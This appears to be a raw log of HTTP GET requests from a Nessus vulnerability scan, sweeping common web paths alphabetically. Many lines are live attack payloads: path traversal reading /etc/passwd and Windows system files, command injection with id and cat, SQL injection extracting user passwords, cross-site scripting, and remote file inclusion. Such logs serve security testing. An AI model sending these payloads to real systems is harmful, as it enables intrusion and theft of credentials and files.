GET /cliente/ HTTP/1.1
GET /clientes/ HTTP/1.1
GET /clwarn.cgi HTTP/1.1
GET /cm/ HTTP/1.1
GET /cmd_ver HTTP/1.1
GET /cmp/ HTTP/1.1
GET /cms/ HTTP/1.1
GET /cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00 HTTP/1.1
GET /cms400.net/ HTTP/1.1
GET /cms400/ HTTP/1.1
GET /cmsample/ HTTP/1.1
GET /cmsmadesimple/ HTTP/1.1
GET /cmsms/ HTTP/1.1
GET /cobalt-images/ HTTP/1.1
GET /cobbler/web HTTP/1.1
GET /cobbler_web HTTP/1.1
GET /code/ HTTP/1.1
GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=/etc/passwd%00 HTTP/1.1
GET /coldfusion_apache_double_null_info_disclosure.nasl-1410938909%2500.cfm HTTP/1.1
GET /coldfusion_double_encoded_null_info_disclosure-1410938899.asp%2500.cfm HTTP/1.1
GET /com/novell/webaccess/WebAccessUninstall.ini HTTP/1.1
GET /comersus/ HTTP/1.1
GET /comments.php HTTP/1.1
GET /comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl HTTP/1.1
GET /comments/ HTTP/1.1
GET /commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1
GET /common/ HTTP/1.1
GET /common/about.php HTTP/1.1
GET /common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd%00 HTTP/1.1
GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm HTTP/1.1
GET /commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /communicator/ HTTP/1.1
GET /community/ HTTP/1.1
GET /company/ HTTP/1.1
GET /compra/ HTTP/1.1
GET /compras/ HTTP/1.1
GET /compressed/ HTTP/1.1
GET /conecta/ HTTP/1.1
GET /conf/ HTTP/1.1
GET /conf/ssl/apache/integrity-smartcenter.key HTTP/1.1
GET /conf/ssl/apache/integrity.key HTTP/1.1
GET /config.php?path[docroot]=/etc/passwd%00 HTTP/1.1
GET /config.php?returnpath=/etc/passwd%00 HTTP/1.1
GET /config/ HTTP/1.1
GET /config/oramon.ini HTTP/1.1
GET /configuration/galleryConfig.txt HTTP/1.1
GET /configurations.do HTTP/1.1
GET /connect/ HTTP/1.1
GET /console HTTP/1.1
GET /console-selfservice/ HTTP/1.1
GET /console/ HTTP/1.1
GET /console/%20HTTP/1.1%0d%0aHost:%20weblogic_plugin_http_injection.nasl%0d%0aX-Nessus:%20/index.jsp HTTP/1.0
GET /console/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
GET /console/faces/com_sun_web_ui/help/masthead.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
GET /console/login.action HTTP/1.1
GET /console/login.jsp HTTP/1.1
GET /console/login/LoginForm.jsp HTTP/1.1
GET /console/portal/ HTTP/1.1
GET /contact.php HTTP/1.1
GET /contacts/php?cal_dir=http://xxxxxxxx/ HTTP/1.1
GET /contenido/ HTTP/1.1
GET /contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd%00 HTTP/1.1
GET /content.php?get_action=display_doc&doc_file=CREDITS HTTP/1.1
GET /content/ HTTP/1.1
GET /content/ZS8PKgTomN.mp3 HTTP/1.0
GET /content/dsjkdjfljk.mp3 HTTP/1.0
GET /contrib/forms/evaluation/C_FormEvaluation.class.php?fileroot=/etc/passwd%00 HTTP/1.1
GET /contribute.cgi?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl HTTP/1.1
GET /contribute.pl?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl HTTP/1.1
GET /controlpanel/ HTTP/1.1
GET /coppermine/ HTTP/1.1
GET /core/ HTTP/1.1
GET /core/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /core/api.php?t_path_core=/etc/passwd%00 HTTP/1.1
GET /core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
GET /core/orionSplashScreen.do HTTP/1.1
GET /corp/ HTTP/1.1
GET /corporate/webpages/login.jsp HTTP/1.1
GET /corporate/webpages/sessionexpired.jsp HTTP/1.1
GET /correo/ HTTP/1.1
GET /counter.php?count_log_file=/nessus HTTP/1.1
GET /counter/ HTTP/1.1
GET /cpg/ HTTP/1.1
GET /credit/ HTTP/1.1
GET /crm/ HTTP/1.1
GET /cron/ HTTP/1.1
GET /crons/ HTTP/1.1
GET /crossdomain.xml HTTP/1.1
GET /crypto/ HTTP/1.1
GET /crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
GET /crystalreportViewers/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
GET /cs/ContentServer HTTP/1.1
GET /cs/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
GET /csSearch.cgi?command=savesetup&setup=print%20`id` HTTP/1.1
GET /csamc52/webadmin?page=invalid&type=browser HTTP/1.1
GET /csr/ HTTP/1.1
GET /css/ HTTP/1.1
GET /csv_db.cgi?file=|id| HTTP/1.1
GET /cuenta/ HTTP/1.1
GET /cuentas/ HTTP/1.1
GET /currency/ HTTP/1.1
GET /currently/ HTTP/1.1
GET /currentsetting.htm HTTP/1.1
GET /customer.pl HTTP/1.1
GET /customers/ HTTP/1.1
GET /cute/ HTTP/1.1
GET /cutenews/ HTTP/1.1
GET /cvslog.cgi?file=<scr ipt>window.alert</SCRIPT> HTTP/1.1
GET /cvstrac/ HTTP/1.1
GET /cvsweb/ HTTP/1.1
GET /cwmail.exe HTTP/1.1
GET /cybercash/ HTTP/1.1
GET /d/ HTTP/1.1
GET /daloradius/ HTTP/1.1
GET /dana/fb/smb/ HTTP/1.1
GET /darkportal/ HTTP/1.1
GET /dat/ HTTP/1.1
GET /data/ HTTP/1.1
GET /data/fetch.php?page=' HTTP/1.1
GET /data/usr HTTP/1.1
GET /database/ HTTP/1.1
GET /databases/ HTTP/1.1
GET /datafiles/ HTTP/1.1
GET /dato/ HTTP/1.1
GET /datos/ HTTP/1.1
GET /day.php HTTP/1.1
GET /db/ HTTP/1.1
GET /db/users.dat HTTP/1.1
GET /db_input.php HTTP/1.1
GET /dbase/ HTTP/1.1
GET /dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
GET /dcforum/ HTTP/1.1
GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
GET /ddem/ HTTP/1.1
GET /ddreport/ HTTP/1.1
GET /ddrint/ HTTP/1.1
GET /de/ HTTP/1.1
GET /default.cfm?Mode=debug HTTP/1.1
GET /default.cfml?Mode=debug HTTP/1.1
GET /default.php HTTP/1.1
GET /demo/ HTTP/1.1
GET /demoauct/ HTTP/1.1
GET /demomall/ HTTP/1.1
GET /demos/ HTTP/1.1
GET /demos/demo.browse.php?filename=/etc/passwd HTTP/1.1
GET /description.xml HTTP/1.1
GET /design/ HTTP/1.1
GET /detail.asp?nChannel='1 HTTP/1.1
GET /dev/ HTTP/1.1
GET /devdescr.xml HTTP/1.1
GET /devel/ HTTP/1.1
GET /development/ HTTP/1.1
GET /devinfo.xml HTTP/1.1
GET /dfshealth.jsp HTTP/1.1
GET /dir/ HTTP/1.1
GET /direct.php?rf=/etc/passwd%00 HTTP/1.1
GET /directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1
GET /directory/ HTTP/1.1
GET /directorymanager/ HTTP/1.1
GET /directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1
GET /discuz/ HTTP/1.1
GET /disp_album.php?id_album=0+or+1=1 HTTP/1.1
GET /display.cgi?preftemp=temp&page=anonymous&file=|id| HTTP/1.1
GET /dl/ HTTP/1.1
GET /dll/ HTTP/1.1
GET /dm/ HTTP/1.1
GET /dms/ HTTP/1.1
GET /dms0/ HTTP/1.1
GET /dms2/Login.jsp HTTP/1.1
GET /dmsdump/ HTTP/1.1
GET /doc-html/ HTTP/1.1
GET /doc/ HTTP/1.1
GET /doc/admin/index.php?ptinclude-http://xxxxxxxx HTTP/1.1
GET /doc/index.php?s=/etc/passwd%00 HTTP/1.1
GET /doc1/ HTTP/1.1
GET /docbuilder/top.php HTTP/1.1
GET /doceboCms/ HTTP/1.1
GET /doceboCore/ HTTP/1.1
GET /doceboKms/ HTTP/1.1
GET /doceboLms/ HTTP/1.1
GET /docman/new.php HTTP/1.1
GET /docs.php?doc=../jpgraph-1.12.1/docs/index HTTP/1.1
GET /docs/ HTTP/1.1
GET /docs/CHANGES HTTP/1.1
GET /docs/index.php?lang=/../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /docs/servlets/index.html HTTP/1.1
GET /docs1/ HTTP/1.1
GET /document/ HTTP/1.1
GET /documentation/ HTTP/1.1
GET /documents/ HTTP/1.1
GET /docushare/ HTTP/1.1
GET /dokeos/ HTTP/1.1
GET /doku.php HTTP/1.1
GET /doku/ HTTP/1.1
GET /dokuwiki/ HTTP/1.1
GET /dolibarr/ HTTP/1.1
GET /dolphin/ HTTP/1.1
GET /dotProject/ HTTP/1.1
GET /dotcms/ HTTP/1.1
GET /dotnetnuke/ HTTP/1.1
GET /dotproject/ HTTP/1.1
GET /down/ HTTP/1.1
GET /download.php?id=' HTTP/1.1
GET /download.php?language=/etc/passwd%00 HTTP/1.1
GET /download/ HTTP/1.1
GET /downloads/ HTTP/1.1
GET /dpnepolicyservice/DPNECentral.asmx HTTP/1.1
GET /drupal/ HTTP/1.1
GET /dsc/ HTTP/1.1
GET /dsdn/ HTTP/1.1
GET /dspam/ HTTP/1.1
GET /dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert('xerox_docushare_dsweb_xss.nasl')%3e HTTP/1.1
GET /dswsbobje/ HTTP/1.1
GET /dump/ HTTP/1.1
GET /durep/ HTTP/1.1
GET /dwr/index.html HTTP/1.1
GET /dwsync.xml HTTP/1.1
GET /dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://xxxxxxxxxx/ HTTP/1.1
GET /dyndev/uuid:0000e018-d0a0-00e0-d0a0-484800e808e0 HTTP/1.1
GET /e/ HTTP/1.1
GET /e107/ HTTP/1.1
GET /e107_admin/admin.php HTTP/1.1
GET /eAccelerator/ HTTP/1.1
GET /eFiction/ HTTP/1.1
GET /eManager/ HTTP/1.1
GET /eaccelerator/ HTTP/1.1
GET /easy_cms_module/ HTTP/1.1
GET /easydownload/ HTTP/1.1
GET /easylog/ HTTP/1.1
GET /ecard/ HTTP/1.1
GET /ecartis/ HTTP/1.1
GET /ecartis/lsg2.cgi HTTP/1.1
GET /eclient/IDMLogon2.jsp HTTP/1.1
GET /edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20 HTTP/1.1
GET /editor/efront_init_tiny_mce.php HTTP/1.1
GET /editor/filemanager/connectors/php/upload.php?Command=FileUpload&Type=File&CurrentFolder=/fckeditor_currentfolder_file_upload-1410939097.php%2e HTTP/1.1
GET /ee/ HTTP/1.1
GET /efiction/ HTTP/1.1
GET /eforum/ HTTP/1.1
GET /eggblog/ HTTP/1.1
GET /egs/ HTTP/1.1
GET /ejemplo/ HTTP/1.1
GET /ejemplos/ HTTP/1.1
GET /elog/ HTTP/1.1
GET /elog/?cmd=Config HTTP/1.1
GET /email/ HTTP/1.1
GET /emailclass/ HTTP/1.1
GET /embed/day.php?path=/etc/passwd%00 HTTP/1.1
GET /employees/ HTTP/1.1
GET /empower?DB=whateverwhatever HTTP/1.1
GET /empoyees/ HTTP/1.1
GET /empris/ HTTP/1.1
GET /emumail.fcgi HTTP/1.1
GET /en-US/ HTTP/1.1
GET /en/ HTTP/1.1
GET /en/main.js HTTP/1.1
GET /encoder.php HTTP/1.1
GET /engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd HTTP/1.1
GET /enter.php?goto=%2F HTTP/1.1
GET /envia/ HTTP/1.1
GET /enviamail/ HTTP/1.1
GET /ericom.min.js HTTP/1.1
GET /error HTTP/1.1
GET /error.php?err=404 HTTP/1.1
GET /error.php?selected_theme=%3cscript%3ealert(uebimiau_selected_theme_xss.nasl)%3c%2fscript%3e HTTP/1.1
GET /error/ HTTP/1.1
GET /error/%3f.jsp HTTP/1.1
GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat HTTP/1.1
GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.1
GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
GET /error/.git/HEAD HTTP/1.1
GET /error/.git/info/refs?service=git-upload-pack HTTP/1.1
GET /error/.svn/entries HTTP/1.1
GET /error/CVS/Entries HTTP/1.1
GET /error/HEAD HTTP/1.1
GET /error/NonExistent.html HTTP/1.1
GET /error/SnoopServlet/ HTTP/1.1
GET /error/_vti_inf.html HTTP/1.1
GET /error/index.jsp HTTP/1.1
GET /error/info/refs?service=git-upload-pack HTTP/1.1
GET /error/nessus/ HTTP/1.1
GET /error/portal/diag/index.jsp HTTP/1.1
GET /error/r57.php HTTP/1.1
GET /error/snoop/ HTTP/1.1
GET /error/snoopservlet/ HTTP/1.1
GET /error/static/./WEB-INF/web.xml HTTP/1.1
GET /error/struts/webconsole.html HTTP/1.1
GET /error_page.htm HTTP/1.1
GET /errors/ HTTP/1.1
GET /es/ HTTP/1.1
GET /estmt/ HTTP/1.1
GET /esupport/ HTTP/1.1
GET /etc/ HTTP/1.1
GET /etc/passwd HTTP/1.1
GET /etomite/ HTTP/1.1
GET /evb/check_url.php?url=pligg_url_sql_injection.nasl'%20UNION%20SELECT%201410938911,2031552070%20--%20 HTTP/1.1
GET /event/index.do HTTP/1.1
GET /event_view.php?eid=34%20UNION%20SELECT%20847694758 HTTP/1.1
GET /events/ HTTP/1.1
GET /ews/index.htm HTTP/1.1
GET /example/ HTTP/1.1
GET /examples/ HTTP/1.1
GET /examples/jsp/index.html HTTP/1.1
GET /examples/jsp/snp/snoop.jsp HTTP/1.1
GET /examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf HTTP/1.1
GET /examples/jsp/source.jsp?/jsp/ HTTP/1.1
GET /examples/jsp/source.jsp?? HTTP/1.1
GET /examples/servlet/SnoopServlet HTTP/1.1
GET /examples/servlets/index.html HTTP/1.1
GET /exc/ HTTP/1.1
GET /excel/ HTTP/1.1
GET /exchange/ HTTP/1.1
GET /exchweb/ HTTP/1.1
GET /exchweb/bin/auth/owalogon.asp?url=http://12345678910 HTTP/1.1
GET /exe/ HTTP/1.1
GET /exec/ HTTP/1.1
GET /exhibit/ HTTP/1.1
GET /exhibitengine/ HTTP/1.1
GET /exodesk/ HTTP/1.1
GET /exoops/ HTTP/1.1
GET /exophpdesk/ HTTP/1.1
GET /exponent/ HTTP/1.1
GET /export/ HTTP/1.1
GET /extension/ HTTP/1.1
GET /external/ HTTP/1.1
GET /eyespyfx_large.jsp HTTP/1.1
GET /f/ HTTP/1.1
GET /f360/login.jsp HTTP/1.1
GET /fanfiction/ HTTP/1.1
GET /faq.php?action=&type=view&s=&id=-1'%20UNION%20SELECT%200%2c706124976%2c0%2c0%2c0%2c0%2c0-- HTTP/1.1
GET /faq/ HTTP/1.1
GET /faq/index.php HTTP/1.1
GET /favicon.ico HTTP/1.1
GET /favicon.iso HTTP/1.1
GET /favicon2.iso HTTP/1.1
GET /faxsurvey?cat%20/etc/passwd HTTP/1.1
GET /fbsd/ HTTP/1.1
GET /fcgi-bin/ HTTP/1.1
GET /fckeditor/ HTTP/1.1
GET /fckeditor/editor/filemanager/connectors/connector?Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl HTTP/1.1
GET /features HTTP/1.1
GET /feeds/ HTTP/1.1
GET /feedsplitter.php?format=../../../../../../../../../../etc/passwd%00&debug=1 HTTP/1.1
GET /feedsplitter/ HTTP/1.1
GET /file HTTP/1.1
GET /file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini HTTP/1.1
GET /file.php?path=/etc/passwd%00 HTTP/1.1
GET /file/ HTTP/1.1
GET /filemanager/ HTTP/1.1
GET /filemgr/ HTTP/1.1
GET /filemgr/browse.php HTTP/1.1
GET /files/ HTTP/1.1
GET /firestats/ HTTP/1.1
GET /flatnuke/ HTTP/1.1
GET /flex2gateway/http HTTP/1.1
GET /flexcms/ HTTP/1.1
GET /flexcube@/ HTTP/1.1
GET /flexcubeat/ HTTP/1.1
GET /flserv.pl?cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=|id| HTTP/1.1
GET /flyspeck/ HTTP/1.1
GET /flyspray/ HTTP/1.1
GET /fm.php HTTP/1.1
GET /fogbugz/default.php HTTP/1.1
GET /foldoc/ HTTP/1.1
GET /force-download.php HTTP/1.1
GET /form-totaller/ HTTP/1.1
GET /form.php HTTP/1.1
GET /form/ HTTP/1.1
GET /forms/ HTTP/1.1
GET /formsmgr/ HTTP/1.1
GET /forum.php HTTP/1.1
GET /forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%20224171850-- HTTP/1.1
GET /forum.php?do=viewtopic&cat=1&topic=1&page=1?<scr ipt>foo</script HTTP/1.1
GET /forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull-- HTTP/1.1
GET /forum.php?id_article=1&id_forum=-1/**/UNION/**/SELECT%201560131210-- HTTP/1.1
GET /forum/ HTTP/1.1
GET /forum/Database/EZsiteForum.mdb HTTP/1.1
GET /forum/database/philboard.mdb HTTP/1.1
GET /forum/forum/ HTTP/1.1
GET /forum/index.php HTTP/1.1
GET /forum_2.php?msg=10&return=<scr ipt>foo</script> HTTP/1.1
GET /forumdata/data/user.idx HTTP/1.1
GET /forumdisplay.php?fid=21\
GET /forums/ HTTP/1.1
GET /forums/forum/ HTTP/1.1
GET /forums/list.page HTTP/1.1
GET /foto/ HTTP/1.1
GET /fotos/ HTTP/1.1
GET /fp/servlet/Login HTTP/1.1
GET /fpadmin/ HTTP/1.1
GET /fpdb/ HTTP/1.1
GET /fpsample/ HTTP/1.1
GET /fr/ HTTP/1.1
GET /frameset/ HTTP/1.1
GET /framesets/ HTTP/1.1
GET /fsms/fsmsh.dll? HTTP/1.1
GET /ftp/ HTTP/1.1
GET /ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1
GET /ftproot/ HTTP/1.1
GET /fusetalk/blog/ HTTP/1.1
GET /fusetalk/forum/ HTTP/1.1
GET /fusion/ HTTP/1.1
GET /fuzzylime/ HTTP/1.1
GET /fxm.exe HTTP/1.1
GET /g/ HTTP/1.1
GET /gadgets/Blog/BlogModel.php?path=/etc/passwd%00 HTTP/1.1
GET /galleries/ HTTP/1.1
GET /gallery/ HTTP/1.1
GET /gallery/displayCategory.php?basepath=http://xxxxxxxx HTTP/1.1
GET /ganglia/ HTTP/1.1
GET /gatedesc.xml HTTP/1.1
GET /gb/ HTTP/1.1
GET /gbook/ HTTP/1.1
GET /gbs/ HTTP/1.1
GET /gcards/ HTTP/1.1
GET /geeklog/ HTTP/1.1
GET /generate.cgi HTTP/1.1
GET /getid3/ HTTP/1.1
GET /gf/ HTTP/1.1
GET /gforge/ HTTP/1.1
GET /gfx/ HTTP/1.1
GET /gitweb.cgi HTTP/1.1
GET /gitweb.perl HTTP/1.1
GET /gitweb.pl HTTP/1.1
GET /global.asa HTTP/1.1
GET /global/ HTTP/1.1
GET /gm.cgi HTTP/1.1
GET /go.cgi|id| HTTP/1.1
GET /goarrp1.html HTTP/1.1
GET /googlesearch/GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.1
GET /gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /gregarius/ HTTP/1.1
GET /greymatter/ HTTP/1.1
GET /grocery/ HTTP/1.1
GET /groups/ HTTP/1.1
GET /gtcatalog/index.php?function=custom&custom=http://xxxxxxxx/1 HTTP/1.1
GET /gtcatalog/password.inc HTTP/1.1
GET /guest/ HTTP/1.1
GET /guestbook.php HTTP/1.1
GET /guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 HTTP/1.1
GET /guestbook/ HTTP/1.1
GET /guestbook/admin/o12guest.mdb HTTP/1.1
GET /guestbook/cfooter.php3 HTTP/1.1
GET /guestbook/guestbook.php HTTP/1.1
GET /guestbook/view.php?PG=foobar HTTP/1.1
GET /guests/ HTTP/1.1
GET /guppy/ HTTP/1.1
GET /gust/ HTTP/1.1
GET /gw/webacc HTTP/1.1
GET /gwadmin-console/login.jsp HTTP/1.1
GET /handler/blah%3Bid|?data=Download HTTP/1.1
GET /hazelcast/rest/cluster HTTP/1.1
GET /hc/ HTTP/1.1
GET /hc/admin/login/ HTTP/1.1
GET /hcl/ HTTP/1.1
GET /header.php HTTP/1.1
GET /header.php?tab=status HTTP/1.1
GET /help.php HTTP/1.1
GET /help.php?section='qualiteam_xcart_sql_xss.nasl HTTP/1.1
GET /help/ HTTP/1.1
GET /help/contents.htm HTTP/1.1
GET /help/copyright.html HTTP/1.1
GET /help/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
GET /help/index.php?help_file=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /helpDesk/ HTTP/1.1
GET /helpcenter/ HTTP/1.1
GET /helpcenterlive/ HTTP/1.1
GET /helpdesk/ HTTP/1.1
GET /hidden/ HTTP/1.1
GET /hide/ HTTP/1.1
GET /hints.pl?|id| HTTP/1.1
GET /historyFrame.html HTTP/1.1
GET /hit_tracker/ HTTP/1.1
GET /hitmatic/ HTTP/1.1
GET /hlstats/ HTTP/1.1
GET /home HTTP/1.1
GET /home.cfm?Mode=debug HTTP/1.1
GET /home.cfml?Mode=debug HTTP/1.1
GET /home.do HTTP/1.1
GET /home.htm HTTP/1.1
GET /home.html?0 HTTP/1.1
GET /home.jsf?autoScroll=0%2c275)%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert('myfaces_tomahawk_autoscroll_xss.nasl' HTTP/1.1
GET /home/ HTTP/1.1
GET /home/search.asp?nChannel='1 HTTP/1.1
GET /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
GET /horde/ HTTP/1.1
GET /horde/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
GET /horde/imp/status.php3 HTTP/1.1
GET /host-manager/html/ HTTP/1.1
GET /hosting_controller/ HTTP/1.1
GET /hostingcontroller/ HTTP/1.1
GET /howto/ HTTP/1.1
GET /hr/ HTTP/1.1
GET /hss/hss?pg=login.ftl HTTP/1.1
GET /hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /ht/ HTTP/1.1
GET /htbin/ HTTP/1.1
GET /htdocs/ HTTP/1.1
GET /htdocs/../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /htgrep/file=index.html&hdr=/etc/passwd HTTP/1.1
GET /html/ HTTP/1.1
GET /html/en/index.htm HTTP/1.1
GET /html/iscscada.htm HTTP/1.1
GET /htmlscript?../../../../../../../../../etc/passwd HTTP/1.1
GET /htsearch.cgi HTTP/1.1
GET /htsearch?-c/nonexistent HTTP/1.1
GET /htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=%3cscript%3ealert('htsearch_sort_xss.nasl')%3c%2fscript%3e&words=htsearch_sort_xss.nasl HTTP/1.1
GET /htsearch?exclude=%60/etc/passwd%60 HTTP/1.1
GET /hw3.cgi?daysonly=0).system('id').( HTTP/1.1
GET /hw3.php?daysonly=0).system(id).( HTTP/1.1
GET /hyperstat/ HTTP/1.1
GET /i-mall.cgi?p=|id| HTTP/1.1
GET /ibank/ HTTP/1.1
GET /ibill/ HTTP/1.1
GET /ical/ HTTP/1.1
GET /icalendar/ HTTP/1.1
GET /icons/ HTTP/1.1
GET /idc/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
GET /idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
GET /idea/ HTTP/1.1
GET /ideabox/include.php?ideaDir=http://xxxxxxxx HTTP/1.1
GET /idealbb/ HTTP/1.1
GET /ideas/ HTTP/1.1
GET /idm/ HTTP/1.1
GET /idm/login.jsp?lang=en&cntry= HTTP/1.1
GET /ifx/?LO=../../../../../etc/passwd HTTP/1.1
GET /igsponsor HTTP/1.1
GET /iisadmin/ HTTP/1.1
GET /iisadmpwd/aexp.htr HTTP/1.1
GET /iisadmpwd/aexp2.htr HTTP/1.1
GET /iisadmpwd/aexp2b.htr HTTP/1.1
GET /iisadmpwd/aexp3.htr HTTP/1.1
GET /iisadmpwd/aexp4.htr HTTP/1.1
GET /iisadmpwd/aexp4b.htr HTTP/1.1
GET /iisprotect/ HTTP/1.1
GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus HTTP/1.1
GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus' HTTP/1.1
GET /iissamples/ HTTP/1.1
GET /ikonboard.cgi HTTP/1.1
GET /ikonboard.cgi?act=ST&f=1&t=1&hl=nessus&st=' HTTP/1.1
GET /ilohamail/ HTTP/1.1
GET /image.php?src=system/config/localconfig.php HTTP/1.1
GET /image/ HTTP/1.1
GET /imageVue/ HTTP/1.1
GET /imagenes/ HTTP/1.1
GET /imagery/ HTTP/1.1
GET /images HTTP/1.0
GET /images HTTP/1.1
GET /images/ HTTP/1.1
GET /images/login_top.gif HTTP/1.1
GET /images/logon_merge.gif HTTP/1.1
GET /imagevue/ HTTP/1.1
GET /imap/ HTTP/1.1
GET /imc HTTP/1.1
GET /imcws/ HTTP/1.1
GET /img/ HTTP/1.1
GET /imp/ HTTP/1.1
GET /imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
GET /imp/status.php3 HTTP/1.1
GET /import/ HTTP/1.1
GET /impreso/ HTTP/1.1
GET /inc/ HTTP/1.1
GET /inc/exif.inc.php?exif_prog=(echo%20-n%20'original_exif_prog_cmd_exec.nasl%3a%20'%3bid)%7c%7cecho HTTP/1.1
GET /inc/formmail.inc.php?script_root=../templates/mail.tpl.txt%00 HTTP/1.1
GET /inc/function.php HTTP/1.1
GET /inc/functions.inc.php?config[ppa_root_path]=/etc/passwd%00 HTTP/1.1
GET /inc/header.php/step_one.php?server_inc=http://xxxx./ HTTP/1.1
GET /inc/pipe.php?HCL_path=http://xxxxxx./ HTTP/1.1
GET /include.php HTTP/1.1
GET /include.php?ideaDir=http://xxxxxxxx HTTP/1.1
GET /include/ HTTP/1.1
GET /include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd HTTP/1.1
GET /include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=%22%3e%3c%2fa%3e%3cscript%3ealert('fusetalk_mult_xss.nasl')%3c%2fscript%3e%3ca%20href%3d%22 HTTP/1.1
GET /include/error/forumerror.cfm?errorno=3 HTTP/1.1
GET /include/help.php?base=http://xxxxxxxx HTTP/1.1
GET /include/monitoring/engine/MakeXML.php?fileOreonConf=/etc/passwd%00 HTTP/1.1
GET /include/sql.php?include_path=/etc/passwd%00 HTTP/1.1
GET /include/theme.inc.php?fullpath=/etc/passwd%00 HTTP/1.1
GET /includer.cgi?template=includer_rcmdexec.nasl HTTP/1.1
GET /includer/ HTTP/1.1
GET /includes/ HTTP/1.1
GET /includes/awol-condensed.inc.php?path=http://xxxxxxxx/ HTTP/1.1
GET /includes/calendar.php?phpc_root_path=http://xxxx./ HTTP/1.1
GET /includes/config.php?relative_script_path=http://xxxxxxx HTTP/1.1
GET /includes/converter.inc.php?include_path=/etc/passwd%00 HTTP/1.1
GET /includes/db_adodb.php?baseDir=/etc/passwd%00 HTTP/1.1
GET /includes/hnmain.inc.php3?config[incdir]=http://xxxxxxxxxx/ HTTP/1.1
GET /includes/main.conf HTTP/1.1
GET /includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /incoming/ HTTP/1.1
GET /index HTTP/1.1
GET /index.JSP HTTP/1.1
GET /index.action HTTP/1.1
GET /index.asp HTTP/1.1
GET /index.aspx HTTP/1.1
GET /index.cfm HTTP/1.1
GET /index.cfm?Mode=debug HTTP/1.1
GET /index.cfm?catid=1%20SQL HTTP/1.1
GET /index.cfm?fuseaction=category.display&category_ID=' HTTP/1.1
GET /index.cfml?Mode=debug HTTP/1.1
GET /index.cgi HTTP/1.1
GET /index.do HTTP/1.1
GET /index.exp HTTP/1.1
GET /index.html HTTP/1.1
GET /index.html?urlmaskfilter=<scr ipt>foo</script> HTTP/1.1
GET /index.js%70 HTTP/1.1
GET /index.jsp HTTP/1.1
GET /index.jsp%00x HTTP/1.1
GET /index.php HTTP/1.0
GET /index.php HTTP/1.1
GET /index.php/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
GET /index.php/admin/login/ HTTP/1.1
GET /index.php/index.html HTTP/1.1
GET /index.php/login HTTP/1.1
GET /index.php?/auth/login/ HTTP/1.1
